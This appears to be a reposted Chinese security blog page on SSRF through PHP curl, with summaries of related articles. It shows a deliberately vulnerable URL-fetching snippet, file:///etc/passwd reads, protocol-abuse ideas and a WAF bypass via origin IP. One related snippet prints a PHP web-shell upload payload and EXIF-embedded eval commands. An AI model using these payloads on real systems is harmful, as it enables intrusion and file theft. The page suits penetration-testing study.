Curl 导致 SSRF 及 WAF 绕过方式

最新推荐文章于 2025-04-05 09:17:55 发布
转载 最新推荐文章于 2025-04-05 09:17:55 发布 · 3.8k 阅读 · 6

本文深入探讨了Curl漏洞如何被用于SSRF攻击,不仅解释了基本原理,还详细列举了多种利用方式,包括操作Redis、任意文件读取、FTP爆破等,并介绍了如何绕过WAF进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Curl 漏洞

背景

SSRF 一般用来探测内网服务,但由于应用层使用的 Request 服务(curl/filegetcontents)一般不只是支持 HTTP/HTTPS,导致可以深层次利用。

漏洞代码

function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $re = curl_exec($ch);
    curl_close($ch);
    return $re;
}
$url = $_GET['url'];
echo curl($url);

利用方式

  • dict (操作 Redis)
  • file (任意文件读取)
  • ftp、ftps (FTP 爆破)
  • tftp(UDP 协议扩展)
  • gopher (操作 Redis、Memcached)
  • imap/imaps/pop3/pop3s/smtp/smtps(爆破邮件用户名密码)
  • rtsp
  • smb/smbs (连接 SMB)
  • telnet - 连接 SSH/Telnet
  • http、https - 内网服务探测
    • 网络服务探测
    • ShellShock 命令执行
    • JBOSS 远程 Invoker war 命令执行
    • Java 调试接口命令执行
    • axis2-admin 部署 Server 命令执行
    • Jenkins Scripts 接口命令执行
    • Confluence SSRF
    • Struts2 一堆命令执行
    • counchdb WEB API 远程命令执行
    • mongodb SSRF
    • docker API 远程命令执行
    • php_fpm/fastcgi 命令执行
    • tomcat 命令执行
    • Elasticsearch 引擎 Groovy 脚本命令执行
    • WebDav PUT 上传任意文件
    • WebSphere Admin 可部署 war 间接命令执行
    • Apache Hadoop 远程命令执行
    • zentoPMS 远程命令执行
    • HFS 远程命令执行
    • glassfish 任意文件读取和 war 文件部署间接命令执行

访问 http://test/test.php?url=http://www.baidu.com

url 改成 file:///etc/passwd (权限够的前提下)

如果知道网站目录,则可以读取网站配置文件

绕过 WAF

当 url 里出现 file:///etc/passwd 等敏感内容的时候,WAF 会拦截行为
我想到的思路是获取源站 IP,直接将请求发送到源站上。

url 改成自己的网站

查一下网站日志文件 access.log

拿到源站 IP 后,通过 Burp 修改请求即可绕过 cdn,绕过 Waf

php curl ssrf,ssrf漏洞学习(PHP)
weixin_29963537的博客
03-16 1633
自己最近原本是想深入的学习一下关于xss、csrf的东西的,可是感觉这些东西需要有很好的js的基础来进行学习。。还有感觉自己感觉也差不多该要学习内网渗透了。。正好ssrf在内网这一块也是比较有用的。于是现在学习一下。我这里面是以php里面的curl为例子来学习的。漏洞代码如下$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);...
SSRF漏洞(原理&绕过姿势)
2301_76694151的博客
04-07 1128
当使用了Python 的urllib库,请求url为用户可控时,就可能存在ssrf漏洞,且可以通过漏洞python urllib http头注入实现对内网未授权仿问的redis 服务器getshell。Request类,URL类的openStream,HttpClient类,URLConnection和HttpURLConnection类,需要注意的是,回显是能否成功利用的重要的条件,在某些场景协议限定为HTTP模式且没有回显,利用。1/4的概率,当第一次解析为外网ip,第二次解析为内网ip,就会成功。
ssrf漏洞waf绕过
最新发布
My笔记的博客
04-05 906
(1)扫描内部网络利用多线程脚本去fuzz可用的端口或者服务。(2)向内部的任意主机和任意端口发送精心构造的数据包。举个例子(soapclient类+crlf漏洞给内网发送任意数据包利用http攻击redis)(3)wordpress开启xmlrpc利用pingback.ping方法造成ddos漏洞。或者请求大文件,始终保持连接keep-alive always(4)利用协议进行暴力穷举(5)如果不知道一个cms是什么cms,让服务端去访问自己所处内网的一些指纹文件来判断是否存在相应的cms。
WAF攻防之SSRF绕过
weixin_34248849的博客
05-17 1040
前言 简单整理一下漏洞中ssrf绕过的一些方法,希望在渗透测试中有更清晰的思路。 什么是SSRF SSRF(Server-Side Request Forgery:服务器端请求伪造)是从服务端获取其他服务器信息的的功能。使用指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的Web应用作为代理,访问内网,攻击远程服务器,读取敏感信息等...
SSRF漏洞以及其WAF绕过总结
b1ackc4t的博客
01-24 3893
SSRF基本介绍 SSRF(Server-Side Request Forgery),服务器端请求伪造,利用漏洞伪造服务端发起请求,从而突破客户端获取不到数据的限制 常见存在SSRF的功能点 在线翻译 图片加载 下载服务 网站采集 文件包含 预览内容 转码 收藏 分享 多媒体加载 在线编程 api demo 站长工具 扫一扫 markdown浏览 常见判断方法 有回显 有延时 比如?url=www.google.com,有大量延时,而访问有的很快,有差异 外带请求 可以利用dnslog平台测试(htt
php curl ssrf,CTFHUB技能树-SSRF【POST请求】
weixin_36043142的博客
03-16 742
CTFHUB SSRF POST请求废话首先开始解题构造gopher数据构造获取flag的请求废话最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先我们看下题目描述,这个肯定是不能错过的。*描述:发一个HTTP POST请求.ssrf是用php的curl实现的.并且会跟踪302跳转.开始解...
ssrfcurl协议,以及查看curl支持协议的办法
qq_59020256的博客
12-29 1048
这里需要注意访问其他网站比如京东淘宝时是是不能直接访问进去的,因为这些网站的协议是https协议ssrf.php 的代码不能直接绕过https的证书所以需要。//判断是否存在url值,如果错存在则返回给$url不存在则返回空。这里需要注意小皮的版本和phpstorm的版本要一致,不然有些网站可能访问不成功。
SSRF安全指北
Tencent_SRC的博客
01-26 1242
文|腾讯蓝军silence前言SSRF (Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。SSRF是...
SSRF(10)302跳转 Bypass
m0_64417923的博客
05-22 2627
题目描述:SSRF中有个很重要的一点是请求可能会跟随302跳转。尝试利用这个来绕过对IP的检测,访问到位于127.0.0.1的flag.php吧。 相关知识 什么是HTTP 302 跳转? 首先我们要知道状态码,状态码是HTTP请求过程结果的描述,由三位数字组成。这三位数字描述了请求过程中所发生的情况。状态码位于响应的起始行中,如在 HTTP/1.0 200 OK 中,状态码就是 200。 每个状态码的第一位数字都用于描述状态(“成功”、“出错”等)。如200 到 299 之间的状态码表示成功;3
WEB漏洞——SSRF
qq_63594215的博客
04-11 1063
这次来介绍WEB漏洞的其中一种类型SSRF,文章将通过讲述其原理、如何挖掘以及怎么利用,包括如何防御和绕过,并且提供靶场来举例说明,详情请往下看。社交分享功能:获取超链接的标题等内容进行显示转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览在线翻译:给网址翻译对应网页的内容图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片云服务厂商:它会远程执行一些命令来判断网址是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试。
Apache HTTP 过滤器filter、开源WAF(ModSecurity)、Apache 模块开发
西京刀客
03-08 2938
在编写Apache模块时,需要具备C或C++编程经验和对Apache Web服务器的基本了解。另外,需要参考Apache的文档和API参考手册来编写代码和构建模块。
SSRF漏洞浅析+ctfhub简单实战
热门推荐
wo41ge的博客
03-27 2万+
花时间 写一下SSRF 凑合看吧 2020/3/24 14.26 漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。 正是因为恶意请求由服务端发起,而服务端能够请求到与自身相连而与外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。 ssrf csrf 重放攻击 换行注入 漏洞成因 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地
curl和gopher协议(ssrf的利用)
Z_Grant的博客
11-05 7897
文章目录一、基础知识的学习(1) cURL(2) PHP的curl函数(3) gopher协议3.1 用gopher协议get传数据3.2 用gopher协议post传数据3.3 在ssrf中使用gopher协议(4) file协议和dict协议 一、基础知识的学习 (1) cURL cURL是一个利用URL语法在命令行下工作的文件传输工具。它支持文件上传和下载,所以是综合传输工具。cURL还包...
利用SSRF漏洞内网探测来攻击Redis(通过curl命令 & gopher协议)
Time Will Tell
09-25 4436
有时候有些漏洞不存在与Get请求中,此时Header CRLF方法就不行了,下面给出第二种方式 Gopher协议支持发出GET、POST请求:可以先拦截get请求包和post请求包,再构造成符合Gopher协议的请求(利用BP)。gopher协议是ssrf利用中一个最强大的协议。 可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求,还可以攻击内网未授权MySQL。 gopher 协议的精髓就在于可以在特定的端口上进行相关命令的执行。 Gopher协议的优势
SSRF
rita_rweb的博客
09-13 214
概述 SSRF Sever-Side Request Forgery:服务器端请求伪造 由于服务端提供了从其他服务器应用获取数据的功能,但又没用对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来,让后端服务器对其发送请求,并返回对该目标地址请求的数据。 数据流:攻击者 -> 服务器 -> 目标地址 根据后台使用的函数的不同,对应的影响和利用方法又不一样。 以下函数若使用不当会引起SSRF: file_get_contents() fsockopen() curl_exec() SSRF
服务端请求伪造SSRF---curl_exec()
Ethan024的博客
04-18 2177
服务端请求伪造SSRF: 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,进而导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 攻击者----->服务器(跳板)---->目标地址 PHP中可能导致SSRF漏洞的危险函数: (1)file_get_contents(); 支持多种协议,包括http,https等。并且可以从本地和远端服务器获取资源 (2)fsockopen(); (3)curl_exec()
linux curl get请求_SSRF(服务器请求伪造)
weixin_39641103的博客
12-22 367
大家好我是早上渗透工程师、晚上健身教练、凌晨工厂保安的铁人三项打工仔。1、漏洞原理SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(正因为请求时由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统)2、漏洞利用方式1....
pikachu之SSRF
Alsn86的博客
12-23 2834
pikachu之SSRF 概述 SSRF(curl) 看一下源代码,服务器会去请求传入的url,并把请求到的内容结果,输出到前端 由于curl可以执行的不止是http协议,还有ftp,telnet等,这样就可以通过传入恶意的url参数,使用服务器的身份进行恶意操作 ...
WAF绕过文件上传,如何绕过Nginx
03-03
### 绕过Nginx WAF实现文件上传的技术方法 #### multipart协议特性利用 在一个基于`multipart/form-data`编码类型的HTTP POST请求里,能够一次性提交多份文档资源给服务器处理。部分Web应用防火墙(WAF),例如某些配置下的Nginx集成的安全模块,在审核此类请求时可能仅针对首个附件实施检测逻辑,而忽视后续附加的数据块。这意味着如果恶意用户将特制的有效载荷置于非首位的位置,则有可能成功规避初步筛查机制[^1]。 ```http POST /upload HTTP/1.1 Host: example.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="benign.txt" Content-Type: text/plain This is a benign file. ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="malicious.php" Content-Type: application/octet-stream <?php echo shell_exec($_GET['cmd']); ?> ------WebKitFormBoundary7MA4YWxkTrZu0gW-- ``` 上述示例展示了通过构造包含两个文件字段(`file`)的表单数据来尝试绕开前端过滤器的情况。其中第二个文件携带了潜在危险代码片段,旨在当被不当执行时触发远程命令注入漏洞。 #### 文件扩展名与MIME类型混淆 对于那些依赖于静态分析(比如检查文件头签名或验证声明的内容类型)来进行防护措施部署的服务端组件来说,改变上传对象的实际属性也可能成为一种有效的对抗手段之一。具体操作上可以通过修改PHP脚本伪装成图像格式的方式绕过基本的身份认证流程: ```bash echo "<?php phpinfo(); ?>" > evil.jpg exiftool -Comment="<?php eval(\$_REQUEST['c']);?>" evil.jpg curl --form "image=@evil.jpg" http://target/upload ``` 这里先创建了一个看似正常的JPEG图形文件但实际上内嵌有可被执行的PHP指令;接着借助ExifTool工具向该图片添加注释标签作为隐藏通道传递额外信息;最后再经由CURL模拟浏览器行为完成整个递交动作[^2]。 需要注意的是,以上讨论均出于学术研究目的,并不鼓励任何非法入侵活动。合法合规地开展安全测试工作应当遵循相关法律法规以及获得授权许可的前提下进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值